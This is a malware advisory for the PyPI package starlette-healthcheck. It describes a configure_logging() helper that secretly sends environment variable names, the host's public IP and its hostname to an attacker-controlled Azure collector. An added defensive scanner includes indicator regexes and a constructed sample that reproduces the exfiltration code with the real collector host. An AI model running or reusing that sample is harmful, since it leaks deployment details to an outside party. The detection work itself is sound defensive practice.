
MAL-2026-6724

Malicious code in starlette-healthcheck (PyPI)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (45d8da59826f5074d5b65d3b4733a4da6e7ce20167db9c14f7004e5fb7abe273)

The package presents itself as an ASGI healthcheck/request-logging utility, but its advertised configure_logging() helper (exposed from the top-level __init__.py) spawns a background thread that POSTs JSON to a hardcoded Azure Container Apps host at ca-fusion-dev-collector.victorioussmoke-2f009910.uksouth.azurecontainerapps.io. On invocation it:

1. iterates os.environ and emits one record per environment variable name (values masked, but the key set discloses the deployment's secret/service layout: AWS_*, DB_*, vendor tokens, internal infra names),
2. resolves the host's public IP via checkip.amazonaws.com, and
3. sends the machine hostname.

None of this is documented in the README or package metadata; the destination is author-controlled, with a default API key embedded in the client and an undocumented LOG_ENDPOINT override. The middleware code itself is a trivial local request-timing logger that does not require any of this telemetry. Author metadata is a generic alias ("ForbiddenFruit") with no homepage. The name is also a plausible-utility name in the ASGI healthcheck space, increasing the chance of incidental adoption.

Affected packages

PyPI / starlette-healthcheck

No fixed version has been published for starlette-healthcheck (pip), and because the reported behaviour is the package's own code rather than a bug in it, there is no known-safe version to pin to. Remove the package and switch to an alternative, and review any host on which configure_logging() was called.
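The following is an added example, not code from the advisory, the reporting source, or the package. It covers both the behaviour described above and the affected-package check: it scans a requirements listing for the affected name (with PEP 503 normalisation, ignoring the version specifier since no fixed version exists) and greps Python source for the indicators the report describes (the named collector host, an azurecontainerapps.io host, the checkip.amazonaws.com lookup, os.environ enumeration, hostname collection, a background thread, and an HTTP POST). The indicator regexes are this example's assumption of how those behaviours would appear in source, not patterns taken from the package, and the two source snippets and the requirements file (including its version pin) are constructed inputs.

```python
"""Added example for MAL-2026-6724: find the affected package in a
requirements listing and grep Python source for the indicators the
report describes. Not the advisory's, the reporter's or the package's code."""
import re
from dataclasses import dataclass

# Collector host named in the advisory.
EXFIL_HOST = ("ca-fusion-dev-collector.victorioussmoke-2f009910"
              ".uksouth.azurecontainerapps.io")

# Assumption: these regexes approximate how each behaviour the report
# describes would appear in Python source. They are not taken from the
# package itself, so treat hits as leads to review, not proof.
INDICATORS = {
    "hardcoded_exfil_host": re.compile(re.escape(EXFIL_HOST)),
    "azure_container_apps_host": re.compile(r"[\w.-]+\.azurecontainerapps\.io"),
    "public_ip_lookup": re.compile(r"checkip\.amazonaws\.com"),
    "environ_enumeration": re.compile(r"\bos\.environ\b"),
    "hostname_collection": re.compile(r"socket\.gethostname\(|platform\.node\("),
    "background_thread": re.compile(r"threading\.Thread\("),
    "http_post": re.compile(r"requests\.post\(|urllib\.request\.urlopen\("),
}


@dataclass(frozen=True)
class ScanResult:
    path: str
    hits: tuple        # indicator names that matched, sorted
    suspicious: bool


def scan_source(path: str, source: str) -> ScanResult:
    """Flag source that names the known host, or that pairs an Azure
    Container Apps host with host fingerprinting, or that reads the
    environment and POSTs from a background thread (the generic shape)."""
    hits = tuple(sorted(n for n, rx in INDICATORS.items() if rx.search(source)))
    found = set(hits)
    fingerprinting = {"environ_enumeration", "public_ip_lookup", "hostname_collection"}
    suspicious = (
        "hardcoded_exfil_host" in found
        or ("azure_container_apps_host" in found and bool(found & fingerprinting))
        or {"environ_enumeration", "http_post", "background_thread"} <= found
    )
    return ScanResult(path, hits, suspicious)


def normalize(name: str) -> str:
    """PEP 503 normalisation: Starlette_HealthCheck and starlette.healthcheck
    both resolve to starlette-healthcheck."""
    return re.sub(r"[-_.]+", "-", name).lower()


AFFECTED = normalize("starlette-healthcheck")


def find_affected_requirements(requirements_text: str) -> list:
    """Return requirement lines naming the affected package. No fixed
    version exists, so the version specifier is deliberately ignored."""
    matches = []
    for raw in requirements_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line or line.startswith("-"):  # skip blanks and pip options
            continue
        m = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
        if m and normalize(m.group(0)) == AFFECTED:
            matches.append(line)
    return matches


# Constructed inputs (not the package's code): a benign request-timing
# middleware, a snippet built to show the reported pattern, and a
# requirements file with a made-up version pin.
BENIGN_SAMPLE = '''
import time
class TimingMiddleware:
    def __init__(self, app):
        self.app = app
    async def __call__(self, scope, receive, send):
        start = time.perf_counter()
        await self.app(scope, receive, send)
        print("request took", time.perf_counter() - start)
'''

SUSPICIOUS_SAMPLE = '''
import os, socket, threading, requests
ENDPOINT = os.getenv("LOG_ENDPOINT", "https://%s/v1/logs")
def _ship():
    records = [{"key": k} for k in os.environ]
    ip = requests.get("https://checkip.amazonaws.com").text.strip()
    requests.post(ENDPOINT, json={"host": socket.gethostname(), "ip": ip, "env": records})
def configure_logging():
    threading.Thread(target=_ship, daemon=True).start()
''' % EXFIL_HOST

REQUIREMENTS_SAMPLE = """
starlette>=0.37
Starlette_HealthCheck==0.1.2  # added for k8s probes
uvicorn[standard]
-r base.txt
"""

if __name__ == "__main__":
    for path, src in (("middleware.py", BENIGN_SAMPLE), ("logging_setup.py", SUSPICIOUS_SAMPLE)):
        r = scan_source(path, src)
        print(f"{path}: suspicious={r.suspicious} hits={r.hits}")
    print("affected requirements:", find_affected_requirements(REQUIREMENTS_SAMPLE))
```

Point scan_source() at the contents of each file under site-packages for the package, and feed find_affected_requirements() every requirements and constraints file in the repository; a bare os.environ reference on its own is deliberately not flagged, since legitimate configuration code reads the environment all the time, and only the combination with an outbound POST from a thread, or with the named host, trips the check.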

References